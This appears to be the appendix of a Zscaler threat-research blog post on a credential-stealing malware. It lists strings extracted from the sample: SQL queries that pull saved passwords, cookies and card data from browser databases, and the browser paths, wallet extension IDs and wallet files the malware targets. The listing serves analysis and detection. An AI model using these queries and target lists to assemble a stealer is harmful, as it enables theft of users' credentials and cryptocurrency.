chromium login data db %ls * Find chromium web data db %ls * Find gecko autofills db %ls * Find gecko cookies db %ls * Find gecko file %ls * Find gecko history db %ls * Find steam data, path %ls * Gdi32.dll * Gecko browsers were retrieved * Gecko/%ls/%ls/%ls * GetModuleHandleA * Global\\%s%x * Gonna gather system information * Gonna grab ChromiumBrowsers * Gonna grab GeckoBrowsers * Gonna grab files * Gonna grab outlook * Gonna grab steam * Gonna grab telegrab * Gonna take screenshot * GrabFiles * HH':'mm':'ss * HWID: * HandleChromiumBrowsers * HandleGeckoBrowsers * Hardwares: * History/%ls_%ls.txt * Holder: * HttpOpenRequest fails; last error: %x * HttpQueryInfo fails; last error: %x * IMAP Password * IP: {ip} * InitializeCriticalSection * InternetConnect fails; last error: %x * InternetCrackUrl fails; last error: %x * InternetOpen fails; last error: %x * Kernel32.dll * Key: * LeaveCriticalSection * Location: {location} * Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) * Name: * Network\\Cookies * Ntdll.dll * ..\\stealer\\geckobrowsers.cpp * Ole32.dll * Operation System: * POP3 Password * Password: * ProductName * Request * Retrieve rule FilesGrabber, server side path: %ls * Rstrtmgr.dll * Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection * SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted FROM credit_cards * SELECT fieldname, value FROM moz_formhistory * SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies * SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies * SELECT origin_url, username_value, password_value FROM logins * SELECT title, url FROM moz_places * SELECT url, title FROM urlsFind chromium history db %ls * SMTP Server * ScreenSize: * Screenshot.jpeg * Sent log. Gonna send done message * Sent screenshot * Software\\Microsoft\\Office * Software\\Valve\\Steam * Sq~70 * SrartLoader * Start * SteamPath * Successfully connected to %s * Successfully start process * SystemInformation.txt * Telegram * There's file to load. Gonna load it * TimeZone: {timezone} * Title: * Tkernel32.dll * Token retrieved: %s * Trying to connect to %s * URL: * USERPROFILE|tELEGRAMdESKTOP|TDATA * Url: * User32.dll * UserName: * Username: * Value: * Wallets/%ls_%ls_%ls * Wininet.dllCrypt32.dll * Wininet.dllCrypt32.dllGdiplus.dll * Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll * Write file content in %ls * Zip code: {zipcode} * abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 * build * cert8.db * cert9.db * chromium-browsers * computername * encrypted_key * extensions * filename * files * done * files * gecko-browsershi * Sent system information * kernel32.dll * key3.db * key4.db * loader * loghub/master * logins.json * msgtzn * SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion * signons.sqlite * sqlite3 * sqlite3_close * sqlite3_column_blob * sqlite3_column_bytes * sqlite3_column_text * sqlite3_open * sqlite3_open_v2 * sqlite3_open_v2sqlite3_finalize * sqlite3_prepare_v2 * sqlite3_step * token * username * wallets\\ TARGETED CHROMIUM BROWSERS * Citrio|%localappdata%\CatalinaGroup\Citrio\User Data * Coowon|%localappdata%\Coowon\Coowon\User Data * Liebao|%localappdata%\liebao\User Data * QIP Surf|%localappdata%\QIP Surf\User Data * Orbitum|%localappdata%\Orbitum\User Data * Comodo Dragon|%localappdata%\Comodo\Dragon\User Data * Amigo|%localappdata%\Amigo\User\User Data * Torch|%localappdata%\Torch\User Data * Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data * Comodo|%localappdata%\Comodo\User Data * 360Browser|%localappdata%\360Browser\Browser\User Data * Maxthon3|%localappdata%\Maxthon3\User Data * K-Melon|%localappdata%\K-Melon\User Data * Sputnik|%localappdata%\Sputnik\Sputnik\User Data * Nichrome|%localappdata%\Nichrome\User Data * CocCoc|%localappdata%\CocCoc\Browser\User Data * Uran|%localappdata%\Uran\User Data * Chromodo|%localappdata%\Chromodo\User Data * Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data * Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data * Opera|%appdata%\Opera Software\Opera Stable * Google Chrome|%localappdata%\Google\Chrome\User Data * Microsoft Edge|%localappdata%\Microsoft\Edge\User Data * Chromium|%localappdata%\Chromium\User Data * Opera|%localappdata%\Opera Software|ChromePlus * %localappdata%\MapleStudio\ChromePlus\User Data * Irpathium|%localappdata%\Irpathium\User Data * 7Star|%localappdata%\7Star\7Star\User Data * CentBrowser|%localappdata%\CentBrowser\User Data * Chedot|%localappdata%\Chedot\User Data * Vivaldi|%localappdata%\Vivaldi\User Data * Kometa|%localappdata%\Kometa\User Data * Elements Browser|%localappdata%\Elements Browser\User Data * Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data * Uran|%localappdata%\uCozMedia\Uran\User Data * Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer TARGETED GECKO BROWSERS * Firefox|%appdata%\Mozilla\Firefox\Profiles * Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles * BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles * Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles * K-Meleon|%appdata%\K-Meleon\Profiles * Icecat|%appdata%\Mozilla\icecat\Profiles TARGETED BROWSER EXTENSIONS * Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad * Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln * EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac * Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne * BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi * iWallet|kncchdigobghenbbaddojjnnaogfppfj * Wombat|amkmjjmmflddogmhpjloimipbofnfjih * MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm * GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj * Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig * Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec * NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao * CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk * Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn * Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp * Keplr|dmkamcknogkgcdfhhbddcghachkejeap * Sollet|fhmfendgdocmcbmfikdcogofphimnkno * Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae * Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf * ICONex|flpiciilemghbmfalicajoolhkkenfel * Nabox Wallet|nknhiehlklippafakaeklbeglecifhad * KHC|hcflpincpppdclinealmandijcmnkbgn * MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn * TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec * Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp * Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb * Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath * Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc * Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc * TezBox|mnfifefkajgofkcjkempathiaecocnkjeh * DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik * BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml * Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm * Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl * Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp * ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd * Coin98 Wallet|aeachknmefphepccionboohckonoeemg * Authenticator|bhghoamapcdpbohphigoooaddinpkbai * Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm * Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd * OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf * LeafWallet|cihmoadaighcejopammfbmddcmdekcje * Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb * EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal * GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl * Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk * Ever|cgeeodpfagjceefieflmdfphplkenlfk * KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk * Rabby|acmacodkjbdgmoleebolmdjonilkdbch * Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa * Oxygen|fhilaheimglignddkjgofkcbgekhenbh * Pali|mgffkfbpathihjpoaomajlbgchddlicgpn * XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf * Nami|lpfcbjknijpeeillifnkikgncikgfhdo * MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm * Keeper|lpilbniiabackdjcionkobglmddfbcjo * Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic * Govy|jnkelfanjkeadonecabehalmbgpfodjm * SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath * Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma * Enkrypt|kkpllkodjelopathieedojogacfhpaihoh * OKX|mcohilncbfahbmgdjkbpemcciiolgcge * HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk * Eternl|kmhcihpebfmpgmihbkipmjlmmioameka * Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba * Martianin|efbglgofoippbgcjepnhiblaibcnclgk * Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj * Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi * Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg * NordPass|fooolghllnmhmmndgjiamiiodkpenpbb * Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob * LastPass|hdokiejnpimakedhajhdlcegeplioahd * BrowserPass|naepdomgkenhinolocfifgehpathddafch * MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed TARGETED CRYPTOCURRENCY WALLETS * Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0 * Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0 * Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0 * Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0 * Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1 * Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1 * Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0 * Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0 * Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0 * Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0 * Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1 * Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0 * Wallets/Ethereum|%appdata%\Ethereum|keystore|0 * Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0 * Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0 * Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0 * Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0 * Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0 EXPLORE MORE ZSCALER BLOGS Mystic Stealer Read Post Technical Analysis of HijackLoader Read Post CyberGate RAT and RedLine Stealer Delivered in Ongoing AutoIt Malware Campaigns Read Post GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX By submitting the form, you are agreeing to our privacy policy. THE ZSCALER EXPERIENCE Learn about: Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP) PRODUCTS & SOLUTIONS Secure Your Users Secure Your Workloads Secure Your IoT and OT Secure Internet Access (ZIA) Secure Private Access (ZPA) Data Protection (CASB/DLP) Digital Experience (ZDX) Posture Control Industry & Market Solutions Partner Integrations Zscaler Client Connector PLATFORM Zero Trust Exchange Platform Secure Digital Transformation Application Transformation Network Transformation Security Transformation RESOURCES Resource Library Security Preview Security & Risk Assessment ThreatLabz Analytics & Insights Upcoming Events Blog Zscaler Academy CXO Revolutionaries Zpedia Ransomware Protection ROI Calculator POPULAR LINKS Pricing & Plans About Zscaler Leadership Team Career Opportunities Find or Become a Partner Customer Success Center Investor Relations Press Center News & Announcements ESG Compliance Contact Zscaler Home English EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues - Brasil Zscaler is universally recognized as the leader in zero trust. Leveraging the largest security cloud on the planet, Zscaler anticipates, secures, and simplifies the experience of doing business for the world's most established companies. English EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues - Brasil Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel SitemapPrivacyLegalSecurity © 2023 Zscaler, Inc. All rights reserved. Zscaler™ and other trademarks listed at zscaler.com/legal/trademarks are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the properties of their respective owners. Zscaler uses cookies to personalize content and ads, to provide social media features and to analyze our traffic. We also share information about your use of our site with our social media, advertising and analytics partners.Please review our Cookies Policy for more information. Cookies Settings Accept Cookies